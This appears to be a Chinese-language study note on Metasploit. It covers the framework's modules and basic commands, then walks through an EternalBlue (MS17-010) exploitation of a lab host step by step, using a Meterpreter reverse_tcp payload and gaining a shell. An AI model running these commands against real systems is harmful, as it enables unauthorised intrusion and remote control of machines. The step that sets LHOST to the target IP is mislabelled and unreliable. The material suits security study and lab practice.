学习记录-MSF使用
注:文章仅用于学术交流,不用于其它用途
一、MSF
Metasploit是一个免费的的框架,本身附带数百个已知软件漏洞的专业级漏洞攻击工具,通过它可以很容易地对计算机软件漏洞实施攻击
二、组成
MSF4所用功能可分为这五个模块,每个模块都有各自的功能领域,形成了渗透测试的流程
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
MFS5新增了一个模块nops,提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。MSF升级更新:apt-get install metasploit-framework
三、工具使用
1.开启数据库:service postgresql start
2.初始化msf数据库:msfdb init
3.开启MSF:msfconsole
4.查看数据连接状态:db_status
5.查看各模块信息
Auxiliary 模块: show auxiliary
命名规则:功能/服务/名称 scanner/smb/smb_ms17_010 (这个就是永恒之蓝)
Exploits 模块: show exploits
rank表示好用级别:normal(正常),excellent(优秀),good(良好),average(平均)
命名规则:操作系统/服务/名称 windows/smb/ms17_010_eternalblue
Payload 模块:show Payload
命名规则:操作系统/类型/名称 windows/x64/meterpreter/reverse_tcp
6.常见命令
| 命令 | 含义 |
|---|---|
| help/? | 帮助菜单 |
| exit | 退出msf |
| Back | 返回 |
| show | 显示所给类型的模块 |
| background | 将当前操作在后台运行 |
| use | 选择使用模块 |
| sessions | 查看会话 |
三、永恒之蓝
基本流程:
扫描靶机 msf > use auxiliary/scanner/smb/smb_ms17_010
选择exploit use exploit/windows/smb/ms17_010_eternalblue
选择payload set payload windows/x64/meterpreter/reverse_tcp
攻击 run/exploit
1)扫描靶机然后设置
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.220.97 设置目标ip
run 开始扫描
发现+标识有一个点可以攻击
2)使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue 使用攻击模块
options 查看设置
required 栏为yes ,则 current setting栏不能为空
set RHOSTS 192.168.220.97 设置目标ip
3)设置攻击载荷
查看信息 show payloads
设置payloads连接 set payload windows/x64/meterpreter/reverse_tcp
options 发现还有一项需要设置
set LHOST 192.168.220.97 设置目标ip
4)开始攻击
run 启动攻击
靶机攻击蓝屏了然后被重启了,kali攻击显示开始攻击
5)可以操作很多东西
比如:获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell